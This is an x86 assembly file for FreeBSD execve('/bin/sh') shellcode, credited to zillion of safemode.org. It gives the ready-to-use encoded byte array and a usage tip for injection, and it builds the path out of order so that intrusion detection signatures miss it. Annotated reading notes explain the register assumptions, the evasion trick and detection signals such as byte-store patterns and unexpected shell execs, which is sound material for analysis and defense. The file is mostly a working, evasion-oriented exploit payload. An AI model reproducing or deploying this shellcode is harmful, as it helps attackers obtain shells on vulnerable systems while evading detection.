;
; FreeBSD x86 execve /bin/sh
;
; Special /bin/sh execve shellcode by zillion (safemode.org). The string
; /bin/sh is constructed between all the other instructions and is therefore
; not directly visible to IDSs.
;
; Note that when you use this shellcode you will have to add some extra bytes
; behind the shellcode, because that is where /bin/sh is written; otherwise
; it can accidentally overwrite important data such as a new return address.
;
; The result:
;
; char shellcode[] =
;     "\xc6\x46\x05\x73\xc6\x46\x01\x62\xc6\x06\x2f\x31\xc0\x88\x46"
;     "\x07\xc6\x46\x02\x69\x50\xc6\x46\x06\x68\x50\xc6\x46\x04\x2f"
;     "\x56\xc6\x46\x03\x6e\xb0\x3b\x50\xcd\x80";
;
; Reading notes (analysis / detection):
;
;  * Effect: eight single-byte stores build "/bin/sh" plus a terminating
;    zero at [esi]..[esi+7], out of order and interleaved with the stack
;    pushes. The stack then holds 0, 0, esi and one extra dword, and
;    int 0x80 is issued with AL = 59, i.e. execve("/bin/sh", NULL, NULL).
;
;  * ESI is never initialised in this listing. The code relies on ESI
;    already holding the address of at least 8 writable bytes at entry;
;    the author's note above suggests that is meant to be the memory
;    directly behind the shellcode -- confirm against the delivery context.
;
;  * The contiguous string "/bin/sh" never occurs in the encoded bytes: each
;    character appears only as the immediate of its own C6 46 <disp8> <imm8>
;    (or C6 06 <imm8>) store, so a content signature on the literal string
;    does not match. The run of byte stores relative to one register followed
;    by CD 80 is itself a recognisable pattern, and behavioural signals (a
;    process unexpectedly exec'ing /bin/sh) together with non-executable
;    stack/heap enforcement do not depend on the byte layout at all.
;

BITS 32

mov byte [esi + 5],0x73     ; offset 5 = 's'
mov byte [esi + 1],0x62     ; offset 1 = 'b'
mov byte [esi],0x2f         ; offset 0 = '/'
xor eax, eax                ; EAX = 0: string terminator and the two null arguments
mov byte [esi + 7], al      ; offset 7 = 0x00, terminates the path string
mov byte [esi + 2],0x69     ; offset 2 = 'i'
push eax                    ; third argument (envp) = NULL
mov byte [esi + 6],0x68     ; offset 6 = 'h'
push eax                    ; second argument (argv) = NULL
mov byte [esi + 4],0x2f     ; offset 4 = '/'
push esi                    ; first argument = pointer to the path being built
mov byte [esi + 3],0x6e     ; offset 3 = 'n' -- the string is now complete
mov al,59                   ; syscall number 59 (0x3b), execve per the header
push eax                    ; extra dword above the arguments: FreeBSD's i386
                            ; int 0x80 convention expects a return-address
                            ; slot there; its value is not used
int 0x80                    ; enter the kernel